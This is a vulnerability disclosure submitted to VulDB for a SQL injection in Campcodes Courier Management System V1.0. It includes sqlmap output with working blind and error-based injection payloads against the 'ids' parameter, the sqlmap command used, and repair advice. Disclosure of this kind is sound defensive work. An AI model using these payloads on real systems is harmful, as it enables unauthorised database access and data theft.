Submit #622322: Campcodes Courier Management System V1.0 SQL Injectioninfo

TitleCampcodes Courier Management System V1.0 SQL Injection
DescriptionCampcodes Courier Management System V1.0 /parcel_list.php SQL injection NAME OF AFFECTED PRODUCT(S) Courier Management System Vendor Homepage https://www.campcodes.com/ AFFECTED AND/OR FIXED VERSION(S) submitter mawenjie Vulnerable File /parcel_list.php VERSION(S) V1.0 Software Link https://www.campcodes.com/projects/php/courier-management-system/ https://www.campcodes.com/downloads/courier-management-system-source-code/ PROBLEM TYPE Vulnerability Type SQL injection Root Cause In courier Management System "/parcel_list.php" found a SQL injection vulnerabilities. Websites can directly use blind injection for SQL queries. Attackers can observe the application's response or other visible behaviors to determine whether the injection is successful and further probe and exploit the data in the database. Impact Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. DESCRIPTION In courier Management System"/parcel_list.php" has discovered an SQL injection vulnerability. Websites can directly apply blind injection to SQL queries. Attackers obtain information about the database content by injecting conditional statements and taking advantage of Boolean condition-based judgments in the application. Attackers can try different conditions and verify their correctness based on the application's response. When constructing SQL query statements, the program directly uses the ID input by the user without performing any verification or filtering on it. Therefore, arbitrary SQL queries can be executed by entering malicious ids. <img width="2348" height="507" alt="Image" src="https://github.com/user-attachments/assets/22d4780c-7c8d-44b6-85ca-0084fc50c5ea" /> Vulnerability details and POC Vulnerability lonameion: 's' parameter Payload: sqlmap identified the following injection point(s) with a total of 283 HTTP(s) requests: Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: http://192.168.126.133:8093/index.php?page=print_pdets&ids=(SELECT (CASE WHEN (1490=1490) THEN 5 ELSE (SELECT 1205 UNION SELECT 6489) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.126.133:8093/index.php?page=print_pdets&ids=5 AND (SELECT 2518 FROM(SELECT COUNT(*),CONCAT(0x71767a7071,(SELECT (ELT(2518=2518,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: http://192.168.126.133:8093/index.php?page=print_pdets&ids=5 OR (SELECT 1235 FROM (SELECT(SLEEP(5)))wyay) --- The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: bash python3 sqlmap.py -u "http://192.168.126.133:8093/index.php?page=print_pdets&ids=5*" --cookie PHPSESSID=1gtgbhgc1ei9ort2lvlrt4tod2 --dbs <img width="1991" height="594" alt="Image" src="https://github.com/user-attachments/assets/aead93c8-2377-4ab8-afaa-e996a22ab04d" /> Suggested repair 1. Use prepared statements and parameter binding: Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. Input validation and filtering: Strictly validate and filter user input data to ensure it conforms to the expected format. 3. Minimize database user permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. Regular security audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Source⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/13
User
 Anonymous User
Submission07/25/2025 09:31 (9 months ago)
Moderation07/26/2025 15:11 (1 day later)
StatusAccepted
VulDB entry317817 [Campcodes Courier Management System 1.0 /parcel_list.php sql injection]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!